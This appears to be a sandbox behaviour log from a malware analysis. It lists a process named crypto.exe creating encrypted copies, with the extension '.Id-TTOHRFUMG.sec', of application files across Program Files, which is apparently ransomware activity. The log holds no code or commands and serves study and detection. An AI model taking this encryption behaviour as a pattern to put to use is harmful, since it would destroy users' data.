File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mscss7cm_fr.dub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\VIEW.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\MedianReport.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKDECL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Maceio.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01044_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\ext\sunec.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21322_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\info.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\meta-index.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187835.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\7z.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\sidebar.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\BUTTON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Origin.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115842.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-imageMask.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\EXITEML.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGAD.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\MedianResume.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PS10TARG.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\xul.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\NEWS.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\wabfind.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\AD98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\tzmappings.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGMASTHD.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0304933.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ospintl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Regina.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Teal.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewFrame.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LABELHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00223_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\UrbanResume.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\control\libwin_hotkeys_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ENVELOPR.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0156537.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSACC.OLB.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCOUPON.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\nssckbi.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\vdk150.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_center.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GRINTL32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYVERTBB.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107302.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00516L.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\42.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00248_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199303.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BIZCARD.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\control\libwin_msg_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309902.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\EntityDataHandler.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01660_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18184_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\HICCUP.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LABEL.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\npt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\BTOPENWORLD.COM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Wordcnvr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ACE.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\trusted.libraries.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\Cocos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR8F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN044.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWS.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PROGRAM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Antigua.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01063_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00152_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR21F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102002.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\calendar.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALSO11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Waitcursor.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21433_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02054_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00382_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00168_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\subscription.xsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14790_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\gfserrorfromgroove.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\EssentialReport.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Subpicture1.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04174_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086424.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MAPIR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libinteger_mixer_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Media Renderer\DMR_48.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\currency.data.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01151_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ENGLISH.LNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\31.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\sq.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR4F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\Hierarchy.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-back-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02293_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\CAGCAT10.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\ELPHRG01.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME43.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\server\Xusage.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLLIBR.REST.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mscss7en.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Msgbox.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\release.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239951.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21533_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR36F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\wmpshare.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Couture.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\IPOLKINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePage.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\fur.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza.Id-TTOHRFUMG.sec	crypto.exe
